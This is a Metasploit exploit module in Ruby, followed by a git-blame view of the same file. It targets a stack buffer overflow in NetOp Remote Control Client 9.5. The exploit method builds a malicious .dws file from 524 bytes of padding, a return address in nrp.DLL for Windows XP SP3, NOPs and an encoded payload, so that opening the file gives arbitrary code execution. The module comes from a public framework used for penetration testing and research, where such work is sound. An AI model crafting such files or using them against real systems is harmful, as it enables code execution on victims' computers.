modules/exploits/windows/fileformat/netop.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetOp Remote Control Client 9.5 Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
          When opening a .dws file containing a specially crafted string longer then 520
          characters will allow an attacker to execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ruben Alejandro "chap0"',
        ],
        'References' => [
          [ 'OSVDB', '72291' ],
          [ 'EDB', '17223' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
        'Platform' => 'win',
        'Payload' => {
          'Space' => 2000,
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => true,
          'StackAdjustment' => -3500
        },
        'Targets' => [
          [
            'Windows XP SP3',
            {
              'Ret' => 0x20d6c32c, # push esp #  ret  - nrp.DLL
              'Offset' => 524
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-04-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),
      ]
    )
  end

  def exploit
    buffer = rand_text(target['Offset'])
    buffer << [target.ret].pack('V')
    buffer << make_nops(30)
    buffer << payload.encoded

    file_create(buffer)
  end
end
Msftidy on netop 2012-04-05 10:33:29 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`Rank = NormalRanking`

			`include Msf::Exploit::FILEFORMAT`

			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'NetOp Remote Control Client 9.5 Buffer Overflow',`
			`'Description' => %q{`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`When opening a .dws file containing a specially crafted string longer then 520`
			`characters will allow an attacker to execute arbitrary code.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`'Ruben Alejandro "chap0"',`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '72291' ],`
Fix EDB references 2012-04-19 23:53:32 -05:00			`[ 'EDB', '17223' ]`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultOptions' => {`
Fixes #362 by changing the exitfunction arguments to be the correct type 2012-05-07 02:41:02 -05:00			`'EXITFUNC' => 'process',`
replace strings with bools 2020-01-14 20:47:27 -05:00			`'DisablePayloadHandler' => true`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Payload' => {`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`'Space' => 2000,`
			`'BadChars' => "\x00\x0a\x0d",`
			`'DisableNops' => true,`
			`'StackAdjustment' => -3500`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [`
			`[`
			`'Windows XP SP3',`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`{`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`'Offset' => 524`
			`}`
			`]`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'DisclosureDate' => '2011-04-28',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Msftidy on netop 2012-04-05 10:33:29 -05:00
			`register_options(`
			`[`
			`OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`end`

			`def exploit`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`buffer = rand_text(target['Offset'])`
Msftidy on netop 2012-04-05 10:33:29 -05:00			`buffer << [target.ret].pack('V')`
			`buffer << make_nops(30)`
			`buffer << payload.encoded`

			`file_create(buffer)`
			`end`
			`end`